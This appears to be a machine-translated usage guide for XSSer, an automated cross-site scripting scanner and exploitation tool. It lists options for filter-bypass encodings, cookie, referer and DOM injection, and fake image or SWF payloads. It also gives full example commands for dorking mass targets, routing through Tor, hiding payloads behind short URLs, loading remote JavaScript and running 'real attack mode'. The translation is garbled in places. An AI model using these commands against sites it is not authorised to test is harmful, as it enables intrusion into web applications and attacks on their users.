======================================================================= BackTrack 5 R1 Xsser of XSS Research (Super XSS attack weapon) instruction in Chinese version
Xsser Instructions for use
================================================================
Brief introduction:
===============================================================
The cross-site scripting person is an automated framework that detects, exploits, and reports on Web-based application XSS vulnerabilities. It contains several options, attempts to bypass some filters, and a variety of special code injection techniques.
Xsser is done by a team of GPL-V3, and the copyright belongs to Psy (-).
======================== ========================================
Options and Settings:
==============================
Xsser [ OPTIONS] [-u <url> |-i <file> |-d <dork>] [-G <get> |-p <post> |-c <crawl>] [Request (S ] [Vector (s)] [Bypasser (s)] [technique (s)] [Final injection (s)]
Options:
--version Display the version number of the program
-H,--help display Help information
-S,--statistics display advanced display output results
-V,--verbose activates redundant mode output results
--GTK Loading Xsser GTK interface
* Special Usage *:
You can choose between Vector (s) and Bypasser (s) to inject the code with special usage:
--imx=imx using XSS code implantation to create a fake image
--fla=flash using XSS code implantation to create a fake SWF
* Select Target *:
At least one choice must be specified to set the URL of the source to get the target (s): You need to select and then run Xsser:
-u URL,--url=url type the destination URL for analysis
-I READFILE reading URLs from a file
-d dork Search URL using search engine dummies
--de=dork_engine uses search engines (Bing, Altavista,yahoo, Baidu, Yandex, Youdao, WebCrawler, ask, etc). View the dork.py file to check for a valid search engine )
* Current HTTP/HTTPS Connection type *:
These options can used to specify which parameter (s) we want to use
Like payload to inject code.
-G GETDATA input a load for auditing, using get parameters (e.g. '/menu.php?q= ')
-P PostData Enter a load for auditing, using POST parameters (e.g. ' foo=1&bar= ')
-C crawling Target URL crawl number (s): 1-99999
--cw=crawler_width Crawl Depth: 1-5
--CL Local Destination URL crawl (default TRUE)
* Installation Request *:
These options are used to develop how to attack targets and use loads. You have multiple options:
* System Calibration *:
These options are useful for XSS attacks with filters and or repeat the code used:
--hash if the target repeats content, the hash is detected every time
(Useful for predicting results that may be wrong)
--heuristic heuristic settings detect that those scripts will be filtered:;\/<> "' =
* Select Attack vector (s) *:
These options are used in special XSS vector source code to inject into each load. Very important, if you don't want to try generic XSS injection code,
Please use the default parameters. There is only one option:
--payload=script OWN-Insert the XSS statement you constructed manually-
--auto Auto-Insert Xsser ' report ' vector from file
* Select Bypasser (s) *:
These options are used to encode the selected attack vectors, and if the target uses anti-XSS filter code and IPS rules, it attempts to bypass the anti-XSS filter code and intrusion Prevention system rules on all targets.
. In short, you can combine other techniques to provide the code:
--str using the String.fromCharCode () method
--une using the unescape () function
--mix minimum String.fromCharCode () function and unescape () function
--dec Using fractional encoding
--hex using 16 binary encoding
--hes using 16-binary encoding with semicolons
--DWO encoded IP address vector is double byte
--doo encoded IP address vector is octal
--cem=cem manually trying different character encodings
(For example: ' Mix,une,str,hex ')
* Special Skills *:
These options are used to try out different XSS techniques. You can make multiple choices:
--coo Coo-Cross-site scripting cookie Injection
--xsa Xsa-cross-site agent scripting
--XSR XSR-Cross-site Referer script
--DCP DCP-DCP Injection
--dom Dom-dom Injection
--ind Ind-http contains quick response to code
--anchor ANC-use shadow attack load (DOM shadow!)
*select Final Injection (s) *:
These options are used in the attack target for special code injection Important, if you want to exploit on-the-wild
Your discovered vulnerabilities. Choose only one option:
*special Final Injection (s) *:
These options can be used to execute some ' special ' injection (s) in
Vulnerable target (s). You can select multiple and combine with your
Final code (except with DCP code):
--onm ONM-Injecting code with the MouseMove () event
--IFR IFR-Inject code with <iframe> resource tags
* Promiscuous mode *:
--silent Suppress Console output results
--update Check xsser latest stable version
--save Direct input results to the template file (XSSlist.dat)
--xml=filexml output ' positives ' to an XML file (--xml Filename.xml )
--publish output ' Positives ' local network (identi.ca)
--short=shorturls shows the last short code (tinyurl, is.gd)
--launch Each XSS found is tested in the browser
================================================================
Examples of usage:
==============================
* Simple XSS injection from URL:
$ Python xsser.py-u "http://host.com"
-------------------
* Read the URL from a file and make a simple injection, setting both the proxy parameters and the HTTP header parameters:
$ python xsser.py-i "file.txt"--proxy "http://127.0.0.1:8118"--referer "666.666.666.666"
-------------------
* Multi-injection from URL, using automated load, and agent, inject load using 116 encoding "Hex", produce verbose output, and save the result to a file (XSSlist.dat):
$ python xsser.py-u "http://host.com"--proxy "http://127.0.0.1:8118"--auto--hex--verbose-w
-------------------
* Multiple injection from URL, using automatic load and special text encoding (first, change the load to 16 binary; second, change the first encoding into a byte code to a string; third, re-encode the second encoding), use proxy spoofing, change the time delay to "a" and use multithreading (5 threads):
$ python xsser.py-u "http://host.com"--auto--cem "Hex,str,hex"--user-agent "xsser!!"--timeout "--threads" "5"
-------------------
* Advanced injection from file reads, load takes the-own-payload parameter, and character encoding bypass detection using the unescape () function:
$ python xsser.py-i "urls.txt"--payload ' a= "get", b= "URL (\" "; c=" JavaScript: ";d =" alert (' XSS '); \ ")"; eval (a+b+c+d); '-- Une
-------------------
* Fool-type select "Duck" engine to inject (Xsser worm!):
$ python xsser.py--de "Duck"-D "search.php?"
-------------------
* Injection crawl depth of 3, number of pages (width) for 4来 detection (Xsser spider!):
$ python xsser.py-c3--cw=4-u "http://host.com"
-------------------
* Simple injection from URL, using post, and statistical results:
$ python xsser.py-u "http://host.com"-P "index.php?target=search&subtarget=top&searchstring="-s
-------------------
* Multiple injection from URL, send parameter type is get, use automatic load, use octal IP address to confuse and output result to a "tinyurl" short url (for the audience to prepare!):
$ python xsser.py-u "http://host.com"-G "bs/?q="--auto--doo--short tinyurl
-------------------
* Simple injection from the URL, using the GET parameter, inject a vector with the cookies parameter, try to use a DOM ghost space (server no logging!) If there is any "vulnerability", then manually implant the "malicious" code (prepare for the real attacker!):
$ python xsser.py-u "http://host.com"-G "bs/?q="--coo--anchor--fr= "!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET parameters, try to generate a short URL with "Malicious Code" (IS.GD) to use a valid DOS to attack the client:
$ python xsser.py-u "http://host.com"-G "bs/?q="--dos--short "is.gd"
-------------------
* Multi-point multi-injection, extracting targets from one target, running automatic load, changing time delay to "20", and using multithreading (5 threads), increasing delay to ten s, injecting parameters into HTTP user-agent, HTTP parameters and cookies parameters, using Tor proxy, IP for octal obfuscation, results statistics, verbose mode to create short URLs (tinyurl) to discover any valid attack load (real attack mode!):
$ python xsser.py-i "list_of_url_targets.txt"--auto--timeout "--threads" "5"--delay "ten"--xsa--xsr--coo--proxy "http://127.0.0.1:8118"--doo-s--verbose--dos--short "TinyURL"
-------------------
* The XSS attack vector injected into the user creates a fake picture with malicious code in "in the blanks" and is ready to be uploaded.
$ python xsser.py--imx "test.png"--payload "! Enter your malicious code here!"
-------------------
* Report output ' positives ' injected into Dorking search (using "ask" dorker), write directly to an XML file.
$ python xsser.py-d "login.php"--de "Ask"--xml "Security_report_xsser_dork_cuil.xml"
-------------------
* Output correct results in Dorking search (using "duck" indicator) to view http://identi.ca directly
(XSS penetration test Vs botnet Alliance)
$ python xsser.py-d "login.php"--de "Duck"--publish
* Online Example:
-http://identi.ca/xsserbot01
-http://twitter.com/xsserbot01
-------------------
* Create a. swf file using XSS code injection
$ python xsser.py--imx "Name_of_file"
-------------------
* If the target produces an incorrect result, a detection hash is sent each time.
$ python xsser.py-u "host.com"--check
-------------------
* Multi-fuzz injection from URLs, including DCP injections to use your own code, cheat with short URLs, and find useful results. XSS Real-time utilization.
$ python xsser.py-u "host.com"--auto--DCP--fp "Enter_your_code_here"--short "is.gd"
-------------------
* Base64 encode the middle mark (rfc2397) to make manual use of a target that can be attacked.
$ python xsser.py-u "host.com"-G "Vulnerable_path"--payload "valid_vector_injected"--b64
-------------------
* Use your Own "own"-Remote code-to load and fuzz tests directly in the browser.
$ python xsser.py-u "host.com"-G "Vulnerable_path"--auto--fr "My_host/path/code.js"--launch
Super-strong XSS attack weapon